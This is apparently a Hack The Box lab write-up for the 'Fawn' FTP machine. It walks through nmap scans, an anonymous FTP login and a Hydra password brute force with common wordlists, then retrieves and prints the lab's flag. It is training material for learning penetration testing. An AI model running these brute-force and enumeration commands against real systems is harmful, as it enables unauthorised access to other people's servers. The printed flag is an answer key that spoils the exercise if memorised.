02.FAWN (FTP)

OVERVIEW

Target Service:	                  FTP
Attack:                           Brute Force
Vulnerability:                    Authentication Vulnerability – Weak Credentials
MITRE Tactics & Technques:	  TA0001: Initial Access
                                   - T1078: Valid Accounts
                                  T1110.001: Brute Force – Password Guessing
                                   - TA0006: Credential Access

Summary: The target system exposed an FTP service with no authentication hardening, 
         allowing access via default or easily guessable credentials. A brute-force 
         attempt using common username-password combinations succeeded, revealing a 
         serious authentication misconfiguration.
root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ nmap -sV -T4 10.129.188.72 -p-
 PORT     STATE SERVICE       VERSION
 21/tcp   open  ftp           vsftpd 3.0.3

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 10.129.188.72 -p 21
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     vsftpd 3.0.3
 | ftp-syst: 
 |   STAT: 
 | FTP server status:
 |      Connected to ::ffff:10.10.14.16
 |      Logged in as ftp
 |      TYPE: ASCII
 |      No session bandwidth limit
 |      Session timeout in seconds is 300
 |      Control connection is plain text
 |      Data connections will be plain text
 |      At session startup, client count was 5
 |      vsFTPd 3.0.3 - secure, fast, stable
 |_End of status
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 |_-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
 Service Info: OS: Unix

 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln 10.129.188.72 -p 21
 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 21
    - e.g., weak FTP configurations, or known vulnerabilities in the FTP service
       - if no results are found then the service may be fully patched!

FOOTHOLD/COMPROMISE

Submit root flag

#ANONYMOUS LOGIN METHOD

#ANONYMOUS LOGIN METHOD
root@htb:~$ ftp 10.129.188.72
Name (10.129.188.72:root): anonymous
ftp> help

 * the get cmd is used to download files from the ftp server

ftp> ls
 229 Entering Extended Passive Mode (|||8196|)
 150 Here comes the directory listing.
 -rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
 226 Directory send OK.

 * anonymous login is configured on the ftp server
    - the anonymous username accepts ANY password given to it!

ftp> get flag.txt
 local: flag.txt remote: flag.txt
 229 Entering Extended Passive Mode (|||59553|)
 150 Opening BINARY mode data connection for flag.txt (32 bytes).
 100% |*************************************************************************************************************************************************|    32      108.88 KiB/s    00:00 ETA
 226 Transfer complete.
 32 bytes received in 00:00 (3.46 KiB/s)

ftp> exit

root@htb:~$ cat flag.txt
 * 035db21c881520061c53e0536e44f815

#BRUTE FORCE METHOD

#BRUTE FORCE METHOD
root@htb:~$ locate username
 /usr/share/seclists/Usernames/top-usernames-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Usernames/top-usernames-shortlist.txt .

root@htb:~$ locate password
 /usr/share/seclists/Passwords/Common-Credentials/top-passwords-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Passwords/Common-Credentials/top-passwords-shortlist.txt .

root@htb:~$ hydra -L top-usernames-shortlist.txt -P top-passwords-shortlist.txt 10.129.188.72 ftp
 [21][ftp] host: 10.129.188.72   login: ftp   password: password
 [21][ftp] host: 10.129.188.72   login: ftp   password: 123456
 [21][ftp] host: 10.129.188.72   login: ftp   password: abc123
 [21][ftp] host: 10.129.188.72   login: ftp   password: querty
 [21][ftp] host: 10.129.188.72   login: ftp   password: 12345678
 [21][ftp] host: 10.129.188.72   login: ftp   password: monkey
 [STATUS] 313.00 tries/min, 313 tries in 00:01h, 112 to do in 00:01h, 16 active
 1 of 1 target successfully completed, 6 valid passwords found

root@htb:~$ ftp 10.129.188.72
Name (10.129.188.72:root): ftp
 331 Please specify the password.
Password:  password

ftp> help

 * the get cmd is used to download files from the ftp server

ftp> ls
 229 Entering Extended Passive Mode (|||8196|)
 150 Here comes the directory listing.
 -rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
 226 Directory send OK.

 * anonymous login is configured on the ftp server
    - the anonymous username accepts ANY password given to it!

ftp> get flag.txt
 local: flag.txt remote: flag.txt
 229 Entering Extended Passive Mode (|||59553|)
 150 Opening BINARY mode data connection for flag.txt (32 bytes).
 100% |*************************************************************************************************************************************************|    32      108.88 KiB/s    00:00 ETA
 226 Transfer complete.
 32 bytes received in 00:00 (3.46 KiB/s)

ftp> exit

root@htb:~$ cat flag.txt
 * 035db21c881520061c53e0536e44f815
Previous01.MEOW (TELNET)Next03.DANCING (SMB)

Last updated